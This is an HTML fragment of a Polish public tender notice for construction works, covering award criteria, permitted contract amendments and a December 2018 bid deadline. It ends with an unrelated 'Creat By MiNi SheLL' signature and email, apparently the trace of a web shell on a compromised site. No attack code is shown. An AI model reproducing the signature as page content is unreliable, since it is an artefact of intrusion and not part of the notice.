id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>?	okres gwarancji na wykonane roboty budowlane</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zakazuje się zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co najmniej jedna z okoliczności wymienionych poniżej:1. Na podstawie art. 144 ust. 1 pkt 1 Ustawy zachodzi co najmniej jedna z poniższych okoliczności z uwzględnieniem warunków ich wprowadzenia:a)	Zmiana warunków wykonania umowy jest konsekwencją:- wystąpienia warunków pogodowych, klęsk żywiołowych powodujących zniszczenia wykonanych wcześniej robót lub uniemożliwiających prowadzenie robót budowlanych zgodnie z technologią, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów;- konieczności wykonania badań archeologicznych;- konieczności wykonania robót dodatkowych- konieczności usunięcia kolizji z urządzeniami infrastruktury podziemnej niezinwentaryzowanej geodezyjnie;- istotnego wpływu przedsięwzięć realizowanych przez gestorów mediów dotyczących terenu objętego przedmiotowym zamówieniem;- braku możliwości udostępnienia obiektu w celu prowadzenia robót, wynikającą z obiektywnych, nieprzewidzianych i niezależnych od Wykonawcy okoliczności;- zmiany osób wykonujących umowę po stronie Wykonawcy, przy czym zmiany w tym zakresie mogą być dokonane wyłącznie pod warunkiem zagwarantowania wykonania przedmiotu umowy przez osoby zapewniające należyte jej wykonanie, w szczególności posiadające kwalifikacje wymagane przez Zamawiającego w pkt. 8.1.2.c) SIWZ;- wstrzymania robót przez Zamawiającego;b)	w przypadku wystąpienia okoliczności wymienionych w ppkt. a) termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania przedmiotu umowy, nie dłużej jednak niż o okres trwania tych okoliczności lub o czas niezbędny na usunięcie skutków oddziaływania tych okoliczności w zakresie umożliwiającym kontynuowanie czynności mających na celu wykonanie przedmiotu umowy;c)	jeżeli w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ppkt. a) konieczna będzie zmiana istotnych postanowień umowy, odpowiednie zapisy umowne zostaną stosownie zmodyfikowane, w sposób zapewniający zgodność z obowiązującymi przepisami prawa;d)	Zachodzi co najmniej jedna z okoliczności wymienionych w art. 144 ust. 1 pkt 2) ÷6) Ustawy.2. W przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia - odpowiednie zapisy umowy zostaną dostosowane do obowiązującego stanu prawnego.3. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy:24.3.1.	Zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego);24.3.2.	Zmiana danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-12-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:45</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com